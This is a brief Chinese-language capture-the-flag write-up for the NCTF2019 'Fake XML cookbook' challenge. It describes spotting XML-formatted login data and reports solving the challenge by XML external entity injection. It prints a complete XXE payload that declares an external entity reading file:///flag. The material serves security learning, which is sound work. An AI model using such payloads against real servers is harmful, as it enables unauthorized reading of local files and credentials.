[NCTF2019]Fake XML cookbook
打开链接,如图所示
尝试注入,无果
抓包进行分析
这里看到username和password都是xml格式,这里应该是xml实体注入。简要来讲就是客户端向服务器发送了XML数据,这个数据能被我们控制,这样我们就可以增加一个恶意的外部实体,实现攻击。
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
<!ENTITY admin SYSTEM "file:///flag">
]>
<user><username>&admin;</username><password>123</password></user>
得到flag